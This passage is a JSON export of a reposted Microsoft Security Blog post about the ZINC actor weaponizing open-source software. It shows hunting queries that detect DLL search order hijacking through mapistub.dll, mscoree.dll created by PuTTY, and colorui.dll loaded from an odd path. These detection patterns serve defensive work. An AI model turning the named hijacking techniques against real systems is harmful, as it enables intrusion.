creation<\/strong><\/p>\n<p>Look for PresentationHost.exe creating mapistub.dll, likely for use in DLL search order hijacking attacks.<\/p>\n<pre class=\"wp-block-preformatted\">DeviceFileEvents | where InitiatingProcessFileName =~ \"presentationhost.exe\" | where FileName =~ \"mapistub.dll\"<\/pre>\n<p><strong>Suspicious mscoree.dll file creation<\/strong><\/p>\n<p>Look instances of mscoree.dll created by PuTTY processes.&nbsp;<\/p>\n<pre class=\"wp-block-preformatted\">DeviceFileEvents | where InitiatingProcessFileName hassuffix \"kitty.exe\" or InitiatingProcessVersionInfoInternalFileName has \"PuTTY\" | where FileName =~ \"mscoree.dll\"<\/pre>\n<p><strong>Suspicious colorcpl.exe image load<\/strong><\/p>\n<p>Surface instances of the colorcpl.exe process loading colorui.dll not in an expected path, indicative of a DLL search order hijacking attack.&nbsp;<\/p>\n<pre class=\"wp-block-preformatted\">DeviceImageLoadEvents  | where InitiatingProcessFileName =~ \"colorcpl.exe\" | where FileName =~ \"colorui.dll\" and not(FolderPath has_any(\"system32\", \"syswow64\", \"program files\")) <\/pre>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/www.microsoft.com\/security\/blog\/2022\/09\/29\/zinc-weaponizing-open-source-software\/\">ZINC weaponizing open-source software<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/www.microsoft.com\/security\/blog\">Microsoft Security Blog<\/a>.<\/p>\n<p><a href=\"https:\/\/www.microsoft.com\/security\/blog\/2022\/09\/29\/zinc-weaponizing-open-source-software\/\" target=\"bwo\" >https:\/\/blogs.technet.microsoft.com\/mmpc\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Katie McCafferty| Date: Thu, 29 Sep 2022 16:00:00 +0000<\/strong><\/p>\n<p>In recent months, Microsoft detected weaponization of legitimate open-source software by an actor the Microsoft Threat Intelligence Center (MSTIC) tracks as ZINC, targeting employees at media, defense and aerospace, and IT service provider organizations in the US, UK, India, and Russia.<\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/www.microsoft.com\/security\/blog\/2022\/09\/29\/zinc-weaponizing-open-source-software\/\">ZINC weaponizing open-source software<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/www.microsoft.com\/security\/blog\">Microsoft Security Blog<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10759,10378],"tags":[4500,10516,22453,26397,714,10510,24137],"class_list":["post-20227","post","type-post","status-publish","format-standard","hentry","category-microsoft","category-security","tag-cybersecurity","tag-microsoft","tag-microsoft-security-intelligence","tag-nation-state-actor","tag-security","tag-social-engineering","tag-zinc"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/20227","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=20227"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/20227\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=20227"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=20227"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=20227"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}